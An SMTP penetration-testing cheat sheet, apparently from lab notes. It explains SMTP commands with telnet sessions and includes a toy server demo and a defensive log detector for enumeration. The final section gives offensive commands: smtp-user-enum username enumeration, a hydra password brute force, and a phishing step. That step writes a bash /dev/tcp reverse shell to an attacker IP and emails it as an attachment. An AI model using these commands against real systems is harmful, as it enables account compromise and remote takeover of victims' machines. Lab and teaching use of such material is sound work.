HELO
The SMTP (Simple Mail Transfer Protocol) HELO request is part of the SMTP protocol used for sending email messages. When a client (usually an email server) initiates a connection to another email server to deliver an email, the first step is the greeting phase. During this phase, the client sends a HELO (or EHLO) command to the receiving server.
It's important to note that some servers use the EHLO command instead of HELO. EHLO is an extended version of HELO and provides additional capabilities, such as supporting SMTP extensions like STARTTLS and authentication mechanisms. The usage of HELO or EHLO depends on the server's capabilities and the specific SMTP conversation between the client and server.
Shelled@htb[/htb]$ telnet 10.129.211.225 25
Trying 10.129.211.225...
Connected to 10.129.211.225.
Escape character is '^]'.
220 WIN-02 ESMTP
HELO x
250 Hello.
EXPN
The "EXPN" command was intended to be used to expand mailing lists. When an email server received an "EXPN" command, it would reveal the full list of email addresses belonging to a mailing list or alias. The idea was to allow senders to verify which email addresses were members of a specific list before sending a message.
Due to security concerns and lack of use, modern SMTP servers have generally deprecated or disabled the "EXPN" command, and it is now considered outdated and unsupported. If you encounter "EXPN" in an SMTP conversation, expect it to be refused on most servers; where it is still enabled, it discloses every member of a list or alias, as in the session below.
Shelled@htb[/htb]$ telnet 10.10.110.20 25
Trying 10.10.110.20...
Connected to 10.10.110.20.
Escape character is '^]'.
220 parrot ESMTP Postfix (Debian/GNU)
EXPN john
250 2.1.0 john@inlanefreight.htb
EXPN support-team
250 2.0.0 carol@inlanefreight.htb
250 2.1.5 elisa@inlanefreight.htb
VRFY
The "VRFY" command is used to verify the existence of an email address on the receiving mail server. When an SMTP client issues the "VRFY" command followed by an email address, the server responds with information about the validity of that address.
The "VRFY" command is often disabled or restricted on modern SMTP servers due to security and privacy concerns. In the past, it was a common target for email address harvesting by spammers, who used it to gather valid email addresses. To prevent abuse and protect user privacy, many SMTP servers now either disable or limit the functionality of the "VRFY" command. As a result, the "VRFY" command is rarely used in practice today.
Shelled@htb[/htb]$ telnet 10.10.110.20 25
Trying 10.10.110.20...
Connected to 10.10.110.20.
Escape character is '^]'.
220 parrot ESMTP Postfix (Debian/GNU)
VRFY root
252 2.0.0 root
VRFY www-data
252 2.0.0 www-data
VRFY new-user
550 5.1.1 <new-user>: Recipient address rejected: User unknown in local recipient table
RCPT
The "RCPT TO" command is used to specify the email address of the recipient(s) (also known as the envelope recipient(s) or forward path). This command tells the receiving mail server who should receive the email. The "RCPT TO" command can be used multiple times to specify multiple recipients. Note that some mail servers may want the email to be encased in angle brackets: RCPT TO:<josh@shelled.io>
Shelled@htb[/htb]$ telnet 10.10.110.20 25
Trying 10.10.110.20...
Connected to 10.10.110.20.
Escape character is '^]'.
220 parrot ESMTP Postfix (Debian/GNU)
MAIL FROM:test@htb.com
250 2.1.0 test@htb.com... Sender ok
RCPT TO:julio
550 5.1.1 julio... User unknown
RCPT TO:kate
550 5.1.1 kate... User unknown
RCPT TO:john
250 2.1.5 john... Recipient ok
NOOP
The SMTP (Simple Mail Transfer Protocol) command "NOOP" stands for "No Operation." It is a command used to perform a null operation, meaning it doesn't have any real functionality other than keeping the connection alive and checking if the server is still responding.
The primary purpose of the NOOP command is to serve as a kind of "ping" or "heartbeat" between the client (email server or client) and the server (email server) during an SMTP session. When a client sends the NOOP command, the server will respond with a success code (usually 250 OK) to indicate that it has received the command successfully.
QUIT
The SMTP (Simple Mail Transfer Protocol) command "QUIT" is used to terminate an SMTP session gracefully. When a client (email server or client) sends the QUIT command to the SMTP server, it indicates that the client has finished sending email messages and wants to close the connection.
QUIT
221 goodbye
Connection closed by foreign host.
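The sessions above show the whole exchange only from the client's side. The following added example (not from the original page or from any project it describes) simulates both sides: a small constructed server that answers with Postfix-style replies, and a client that sends the same HELO, VRFY, MAIL FROM, RCPT TO, NOOP and QUIT commands. The server is a toy model, not Postfix; the user set and the "disable_vrfy" switch are assumptions, the latter modelling what a server configured to refuse VRFY returns (Postfix's `disable_vrfy_command = yes` gives a 502) while RCPT TO still distinguishes known from unknown users.

```python
import socket
import threading

# Constructed set of local accounts; it plays the role of the "local recipient
# table" named in the 550 reply on this page (assumption, not real data).
LOCAL_USERS = {"root", "www-data", "john"}


def reply_for(verb, arg, disable_vrfy=False):
    """Return a Postfix-style reply line for one command (constructed model)."""
    if verb in ("HELO", "EHLO"):
        return "250 Hello."
    if verb == "NOOP":
        return "250 2.0.0 Ok"
    if verb == "QUIT":
        return "221 2.0.0 Bye"
    if verb == "MAIL":
        return "250 2.1.0 Ok"
    if verb in ("VRFY", "RCPT"):
        # RCPT carries "TO:<addr>"; VRFY carries the bare address.
        addr = arg.partition(":")[2] if verb == "RCPT" else arg
        addr = addr.strip().strip("<>")
        user = addr.split("@", 1)[0]
        if verb == "VRFY" and disable_vrfy:
            # What a server with VRFY switched off answers (assumed wording).
            return "502 5.5.1 VRFY command is disabled"
        if user in LOCAL_USERS:
            return f"252 2.0.0 {addr}" if verb == "VRFY" else "250 2.1.5 Ok"
        return (f"550 5.1.1 <{addr}>: Recipient address rejected: "
                "User unknown in local recipient table")
    return "502 5.5.2 Error: command not recognized"


def serve_one(srv, disable_vrfy):
    """Accept a single connection and answer commands until QUIT or EOF."""
    conn, _ = srv.accept()
    with conn, conn.makefile("rb") as rf:
        conn.sendall(b"220 parrot ESMTP constructed-example\r\n")
        for raw in rf:
            verb, _, arg = raw.decode().rstrip("\r\n").partition(" ")
            verb = verb.upper()
            conn.sendall(reply_for(verb, arg, disable_vrfy).encode() + b"\r\n")
            if verb == "QUIT":
                break
    srv.close()


def start_server(disable_vrfy=False):
    """Bind a loopback listener on a free port and serve it on a thread."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    threading.Thread(target=serve_one, args=(srv, disable_vrfy), daemon=True).start()
    return srv.getsockname()[1]


def smtp_exchange(host, port, commands):
    """Send each command in turn; return [(command, reply), ...] incl. greeting."""
    with socket.create_connection((host, port)) as s, s.makefile("rb") as rf:
        transcript = [("", rf.readline().decode().rstrip("\r\n"))]
        for cmd in commands:
            s.sendall(cmd.encode() + b"\r\n")
            transcript.append((cmd, rf.readline().decode().rstrip("\r\n")))
    return transcript


def run_demo(disable_vrfy=False):
    """Replay the commands from the sessions on this page against the toy server."""
    port = start_server(disable_vrfy)
    cmds = ["HELO x", "VRFY root", "VRFY new-user", "MAIL FROM:<test@htb.com>",
            "RCPT TO:<john>", "RCPT TO:<kate>", "NOOP", "QUIT"]
    return smtp_exchange("127.0.0.1", port, cmds)


if __name__ == "__main__":
    for flag in (False, True):
        print(f"--- disable_vrfy={flag}")
        for cmd, reply in run_demo(flag):
            print(f"C: {cmd}" if cmd else "C: (connect)")
            print(f"S: {reply}")
```

Run both variants and compare: with VRFY disabled the 252/550 split disappears from VRFY, but RCPT TO still answers 250 for a known user and 550 for an unknown one, which is why disabling VRFY and EXPN alone does not end username disclosure.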
Username Enumeration
There are multiple tools that can be used to enumerate usernames on an SMTP server.
smtp-user-enum
smtp-user-enum -M RCPT -U users.list -D inlanefreight.htb -t 10.129.68.69
-M is the mode: RCPT, EXPN, or VRFY.
-U is the list of usernames.
-D is the domain.
-t is the target.
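From the server side, an enumeration run like the one above leaves a trail of "User unknown" rejections from one client. The following added example (not from the original page or from smtp-user-enum) is a small detector over Postfix smtpd log lines: it groups 550 5.1.1 recipient rejections by client IP and flags any client that probed more than a threshold of distinct unknown recipients. The log lines are constructed for the example in the shape of Postfix's NOQUEUE reject messages, and the threshold of 5 is an assumption to tune per site.

```python
import re
from collections import defaultdict

# Postfix smtpd reject line, as logged when a recipient is not in the local
# recipient table (pattern written from the 550 text shown on this page).
REJECT_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ postfix/smtpd\[\d+\]: "
    r"NOQUEUE: reject: RCPT from \S+\[(?P<ip>[^\]]+)\]: 550 5\.1\.1 "
    r"<(?P<rcpt>[^>]+)>: Recipient address rejected: User unknown"
)

# Constructed sample log: one client probing many names, one remote server
# with a single typo in a recipient address.
SAMPLE_LOG = """\
Jul 14 10:00:01 parrot postfix/smtpd[4242]: connect from unknown[10.10.14.5]
Jul 14 10:00:02 parrot postfix/smtpd[4242]: NOQUEUE: reject: RCPT from unknown[10.10.14.5]: 550 5.1.1 <julio@inlanefreight.htb>: Recipient address rejected: User unknown in local recipient table; from=<test@htb.com> to=<julio@inlanefreight.htb> proto=SMTP helo=<x>
Jul 14 10:00:02 parrot postfix/smtpd[4242]: NOQUEUE: reject: RCPT from unknown[10.10.14.5]: 550 5.1.1 <kate@inlanefreight.htb>: Recipient address rejected: User unknown in local recipient table; from=<test@htb.com> to=<kate@inlanefreight.htb> proto=SMTP helo=<x>
Jul 14 10:00:03 parrot postfix/smtpd[4242]: NOQUEUE: reject: RCPT from unknown[10.10.14.5]: 550 5.1.1 <kate@inlanefreight.htb>: Recipient address rejected: User unknown in local recipient table; from=<test@htb.com> to=<kate@inlanefreight.htb> proto=SMTP helo=<x>
Jul 14 10:00:03 parrot postfix/smtpd[4242]: NOQUEUE: reject: RCPT from unknown[10.10.14.5]: 550 5.1.1 <alice@inlanefreight.htb>: Recipient address rejected: User unknown in local recipient table; from=<test@htb.com> to=<alice@inlanefreight.htb> proto=SMTP helo=<x>
Jul 14 10:00:04 parrot postfix/smtpd[4242]: NOQUEUE: reject: RCPT from unknown[10.10.14.5]: 550 5.1.1 <bob@inlanefreight.htb>: Recipient address rejected: User unknown in local recipient table; from=<test@htb.com> to=<bob@inlanefreight.htb> proto=SMTP helo=<x>
Jul 14 10:00:04 parrot postfix/smtpd[4242]: NOQUEUE: reject: RCPT from unknown[10.10.14.5]: 550 5.1.1 <carl@inlanefreight.htb>: Recipient address rejected: User unknown in local recipient table; from=<test@htb.com> to=<carl@inlanefreight.htb> proto=SMTP helo=<x>
Jul 14 10:00:05 parrot postfix/smtpd[4242]: NOQUEUE: reject: RCPT from unknown[10.10.14.5]: 550 5.1.1 <dave@inlanefreight.htb>: Recipient address rejected: User unknown in local recipient table; from=<test@htb.com> to=<dave@inlanefreight.htb> proto=SMTP helo=<x>
Jul 14 10:00:06 parrot postfix/smtpd[4242]: 7A1B2C3D4E: client=unknown[10.10.14.5]
Jul 14 10:05:00 parrot postfix/smtpd[4301]: NOQUEUE: reject: RCPT from mail.example.net[203.0.113.7]: 550 5.1.1 <jhon@inlanefreight.htb>: Recipient address rejected: User unknown in local recipient table; from=<ann@example.net> to=<jhon@inlanefreight.htb> proto=ESMTP helo=<mail.example.net>
"""


def unknown_recipients(lines):
    """Map each client IP to the set of distinct unknown recipients it tried."""
    seen = defaultdict(set)
    for line in lines:
        m = REJECT_RE.search(line)
        if m:
            seen[m["ip"]].add(m["rcpt"].lower())
    return seen


def find_enumerators(lines, threshold=5):
    """Return {ip: distinct_unknown_count} for clients at or above the threshold."""
    return {ip: len(rcpts) for ip, rcpts in unknown_recipients(lines).items()
            if len(rcpts) >= threshold}


if __name__ == "__main__":
    for ip, n in find_enumerators(SAMPLE_LOG.splitlines()).items():
        print(f"possible recipient enumeration from {ip}: {n} distinct unknown users")
```

Counting distinct recipients rather than raw rejections keeps a legitimate sender retrying one mistyped address below the threshold. On the Postfix side, `disable_vrfy_command = yes` removes the VRFY path, and `smtpd_soft_error_limit` / `smtpd_hard_error_limit` slow down and then disconnect clients that accumulate errors in one session, so a detector like this is the complement to those settings rather than a replacement.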
Password Bruteforce
There are multiple tools that can be used to brute-force users' passwords on an SMTP server.
hydra
hydra -l 'marlin@inlanefreight.htb' -P pws.list 10.129.68.69 smtp
Phishing
We can send the target a malicious email and get a reverse shell back when they open it.
Reverse Shell as a Linux Application
echo 'bash -c "bash -i >& /dev/tcp/10.13.30.137/4444 0>&1"' > application
CLI: sendEmail
sendEmail -f shelled@test.com -t hakanbey@uranium.thm -a ./application -m "Hi" -s 10.10.23.23 -o tls=no